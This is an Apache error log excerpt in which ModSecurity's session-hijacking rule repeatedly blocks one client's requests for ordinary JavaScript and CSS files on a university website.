[Mon Aug 28 08:44:20.619953 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv79MCo-f0AAJb0F8QAAAAK"]
[Mon Aug 28 08:44:20.631241 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv79MCo-f0AAJbzb-0AAAAD"]
[Mon Aug 28 08:44:20.631361 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv79MCo-f0AAJZmptQAAAAA"]
[Mon Aug 28 08:44:20.632397 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv79MCo-f0AAJaL2TIAAAAG"]
[Mon Aug 28 08:44:20.680373 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv79MCo-f0AAJXyOjoAAAAM"]
[Mon Aug 28 08:44:20.747587 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv79MCo-f0AAJbPENAAAAAC"]
[Mon Aug 28 08:44:20.795347 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv79MCo-f0AAJWfaCQAAAAI"]
[Mon Aug 28 08:44:20.807933 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv79MCo-f0AAJaL2TMAAAAG"]
[Mon Aug 28 08:44:20.809394 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv79MCo-f0AAJbzb-4AAAAD"]
[Mon Aug 28 08:44:20.809632 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv79MCo-f0AAJSr3z8AAAAO"]
[Mon Aug 28 08:44:20.813276 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv79MCo-f0AAJZmptUAAAAA"]
[Mon Aug 28 08:44:20.854986 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv79MCo-f0AAJXyOjsAAAAM"]
[Mon Aug 28 08:44:20.909279 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv79MCo-f0AAJWfaCUAAAAI"]
[Mon Aug 28 08:44:20.909597 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv79MCo-f0AAJbxo6oAAAAJ"]
[Mon Aug 28 08:44:20.912593 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv79MCo-f0AAJbPENEAAAAC"]
[Mon Aug 28 08:44:20.915654 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv79MCo-f0AAJZmptYAAAAA"]
[Mon Aug 28 08:44:20.924328 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv79MCo-f0AAJSr30AAAAAO"]
[Mon Aug 28 08:44:20.968780 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv79MCo-f0AAJbzb-8AAAAD"]
[Mon Aug 28 08:44:21.007953 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv79cCo-f0AAJZmptcAAAAA"]
[Mon Aug 28 08:44:21.012622 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv79cCo-f0AAJWfaCYAAAAI"]
[Mon Aug 28 08:44:21.045733 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv79cCo-f0AAJbxo6sAAAAJ"]
[Mon Aug 28 08:44:21.053338 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv79cCo-f0AAJSr30EAAAAO"]
[Mon Aug 28 08:44:21.067443 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv79cCo-f0AAJbPENIAAAAC"]
[Mon Aug 28 08:44:21.112263 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv79cCo-f0AAJXyOjwAAAAM"]
[Mon Aug 28 08:44:21.139461 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv79cCo-f0AAJbzcAAAAAAD"]
[Mon Aug 28 08:44:21.139545 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv79cCo-f0AAJaL2TQAAAAG"]
[Mon Aug 28 08:44:21.161654 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv79cCo-f0AAJbxo6wAAAAJ"]
[Mon Aug 28 08:44:21.168873 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv79cCo-f0AAJb0F8UAAAAK"]
[Mon Aug 28 08:44:21.178300 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv79cCo-f0AAJWfaCcAAAAI"]
[Mon Aug 28 08:44:21.224281 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv79cCo-f0AAJSr30IAAAAO"]
[Mon Aug 28 08:44:21.252562 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv79cCo-f0AAJZmptgAAAAA"]
[Mon Aug 28 08:44:21.253622 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv79cCo-f0AAJbxo60AAAAJ"]
[Mon Aug 28 08:44:21.283641 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv79cCo-f0AAJb0F8YAAAAK"]
[Mon Aug 28 08:44:21.298057 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv79cCo-f0AAJSr30MAAAAO"]
[Mon Aug 28 08:44:21.321677 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv79cCo-f0AAJZmptkAAAAA"]
[Mon Aug 28 08:44:21.418196 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv79cCo-f0AAJaL2TUAAAAG"]
[Mon Aug 28 08:44:21.467618 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv79cCo-f0AAJbPENMAAAAC"]
[Mon Aug 28 08:44:21.479120 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv79cCo-f0AAJbzcAEAAAAD"]
[Mon Aug 28 08:44:21.579254 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv79cCo-f0AAJSr30QAAAAO"]
[Mon Aug 28 08:44:21.580380 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv79cCo-f0AAJWfaCgAAAAI"]
[Mon Aug 28 08:44:21.677042 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv79cCo-f0AAJbzcAIAAAAD"]
[Mon Aug 28 08:44:21.708437 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv79cCo-f0AAJbPENQAAAAC"]
[Mon Aug 28 08:44:21.720113 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv79cCo-f0AAJXyOj0AAAAM"]
[Mon Aug 28 08:44:21.814979 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv79cCo-f0AAJWfaCkAAAAI"]
[Mon Aug 28 08:44:21.819070 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv79cCo-f0AAJSr30UAAAAO"]
[Mon Aug 28 08:44:21.839713 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv79cCo-f0AAJb0F8cAAAAK"]
[Mon Aug 28 08:44:22.003450 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv79sCo-f0AAJbxo64AAAAJ"]
[Mon Aug 28 08:44:22.007434 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv79sCo-f0AAJbPENUAAAAC"]
[Mon Aug 28 08:44:22.043976 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv79sCo-f0AAJXyOj4AAAAM"]
[Mon Aug 28 08:44:22.244117 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv79sCo-f0AAJbzcAMAAAAD"]
[Mon Aug 28 08:44:22.307458 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv79sCo-f0AAJWfaCoAAAAI"]
[Mon Aug 28 08:44:22.409241 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv79sCo-f0AAJaL2TYAAAAG"]
[Mon Aug 28 08:44:22.502180 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv79sCo-f0AAJb0F8gAAAAK"]
[Mon Aug 28 08:44:22.774948 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv79sCo-f0AAJXyOj8AAAAM"]
[Mon Aug 28 08:44:22.958873 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv79sCo-f0AAJSr30YAAAAO"]
[Mon Aug 28 08:44:23.085238 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv798Co-f0AAJZmptoAAAAA"]
[Mon Aug 28 08:44:23.223220 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv798Co-f0AAJWfaCsAAAAI"]
[Mon Aug 28 08:44:23.427645 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv798Co-f0AAJbPENYAAAAC"]
[Mon Aug 28 08:44:23.544333 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv798Co-f0AAJSr30cAAAAO"]
[Mon Aug 28 08:44:23.730155 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv798Co-f0AAJbzcAQAAAAD"]
[Mon Aug 28 08:44:23.857583 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv798Co-f0AAJbxo68AAAAJ"]
[Mon Aug 28 08:44:23.995724 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv798Co-f0AAJaL2TcAAAAG"]
